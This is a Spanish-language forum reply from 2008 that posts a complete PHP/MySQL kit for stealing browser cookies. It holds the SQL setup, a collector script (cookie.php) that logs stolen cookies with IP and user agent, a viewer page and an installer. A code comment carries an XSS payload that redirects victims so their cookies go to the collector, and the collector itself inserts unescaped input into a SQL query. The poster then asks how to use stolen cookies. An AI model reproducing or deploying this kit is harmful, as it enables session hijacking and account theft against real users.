
30/07/2008, 11:57
|
 | | | Fecha de Ingreso: marzo-2008 Ubicación: Aqui estoy
Mensajes: 574
Antigüedad: 17 años Puntos: 20 | |
Respuesta: Me robaron el cookie... Codigo para robar Cookies:
SQL.txt (se instala en el phpmyadmin)
<TABLE cellSpacing=1 cellPadding=3 width="90%" align=center border=0><TBODY><TR><TD>Código:</TD></TR><TR><TD class=code>
CREATE TABLE `cookies` (
`id` int(10) NOT NULL auto_increment,
`txtcookie` text NOT NULL,
`ip` text NOT NULL,
`agent` text NOT NULL,
PRIMARY KEY (`id`)
) TYPE=MyISAM;
INSERT INTO `cookies` VALUES (1, '5sS$t3st|ng5Sss', '127.0.0.1', 'Windogs');
</TD></TR></TBODY></TABLE>
config.php
<TABLE cellSpacing=1 cellPadding=3 width="90%" align=center border=0><TBODY><TR><TD>Código:</TD></TR><TR><TD class=code>
<?php
$dbhost = "localhost";
$dbuser = "root";
$dbpass = "";
$db = "ecker";
@$cxn = mysql_connect($dbhost, $dbuser, $dbpass);
@mysql_select_db($db, $cxn);
?>
</TD></TR></TBODY></TABLE>
cookie.php
<TABLE cellSpacing=1 cellPadding=3 width="90%" align=center border=0><TBODY><TR><TD>Código:</TD></TR><TR><TD class=code><?php
/*
* first you must send cookie to script, it goes something like this:
* Code:
*
* [Solo los usuarios registrados pueden acceder a los links. ]
*
* in cookie.php there should be something like this:
* Code:
* <script>document.location='http://localhost/cookie.php?cookie='+window.document.cookie;</script>
*/
$cookie = $_GET['cookie'];
$REMOTE_ADDR = $_SERVER['REMOTE_ADDR'];
$HTTP_USER_AGENT = $_SERVER['HTTP_USER_AGENT'];
include("config.php");
mysql_query("insert INTO `cookies` (txtcookie, ip, agent) values ('$cookie', '$REMOTE_ADDR', '$HTTP_USER_AGENT')");
# si no quieres utilizar una base de datos borra los gatitos de abajo (linea 24 y 25) y coloca otro gatito (#) en la linea 21
# $fp = fopen("cookies.txt", "a+");
# fwrite($fp, $cookie);
?>
</TD></TR></TBODY></TABLE>
db.php (aqui se guardan llas cookies)
<TABLE cellSpacing=1 cellPadding=3 width="90%" align=center border=0><TBODY><TR><TD>Código:</TD></TR><TR><TD class=code><?php
require("config.php");
$sql = "SELECT * FROM cookies ORDER by id DESC";
$query = mysql_query($sql);
$design = 0;
echo "<table border=\"0\" cellspacing=\"1\" cellpadding=\"2\" width=\"100%\" style=\"border-top:solid black .5pt; border-left:solid black .5pt; border-bottom:solid black .5pt; border-right:solid black .5pt;\">";
echo " <tr>";
echo " <td><font color=black><b>#</b></font></td>";
echo " <td><font color=black><b>Cookie</b></font></td>";
echo " <td><font color=black><b>IP</b></font></td>";
echo " <td><font color=black><b>HTTP user agent</b></font></td>";
echo " </tr>";
while ($row = mysql_fetch_array($query)) {
if ($design == 0) {
$color = '#F7F7F7'; # row color
$design++;
}
else {
$color = '#FFFFFF'; # row color 2
$design = 0;
}
$row[id] = htmlentities($row[id]);
$row[txtcookie] = htmlentities($row[txtcookie]);
$row[ip] = htmlentities($row[ip]);
$row[agent] = htmlentities($row[agent]);
echo " <tr>";
echo " <td bgcolor='$color'>".$row['id']."</td>";
echo " <td bgcolor='$color'>".$row['txtcookie']."</td>";
echo " <td bgcolor='$color'>".$row['ip']."</td>";
echo " <td bgcolor='$color'>".$row['agent']."</td>";
echo " </tr>";
}
echo "</table>";
mysql_free_result($query);
mysql_close($cxn);
?></TD></TR></TBODY></TABLE>
install.php (opcional)
Si te da flojera abrir tu phpmyadmin e instalar SQL.txt ejecuta este archivo. Posteriormente elimina este archivo.
<TABLE cellSpacing=1 cellPadding=3 width="90%" align=center border=0><TBODY><TR><TD>Código:</TD></TR><TR><TD class=code><?php
require("config.php");
if(!$cxn) {
die("Error al conectar a la base de datos.");
} else {
mysql_query("CREATE TABLE cookies (id int(10) NOT NULL auto_increment,txtcookie text NOT NULL,ip text NOT NULL,agent text NOT NULL,PRIMARY KEY (id)) TYPE=MyISAM;");
mysql_query("INSERT INTO cookies VALUES (1, '5sS$t3st|ng5Sss', '127.0.0.1', 'Windogs');");
echo "La instalacion fue todo un exito. Borra de tu servidor el archivo install.php";
}
mysql_close($cxn);
?></TD></TR></TBODY></TABLE>
bue.. ese es un codigo para robar cookies... eso en google buscas y hay a patadas...
pero una ves que tenes la cookie como la usas? eso es lo que quiero saber asi parto de ahi para ir probando la seguridad de mi sistema.....
__________________ Firma: Es mas dificil para el mono entender que el hombre desciende de el....
PD: Siempre doy karma al que me da una buena respuesta... ;0) |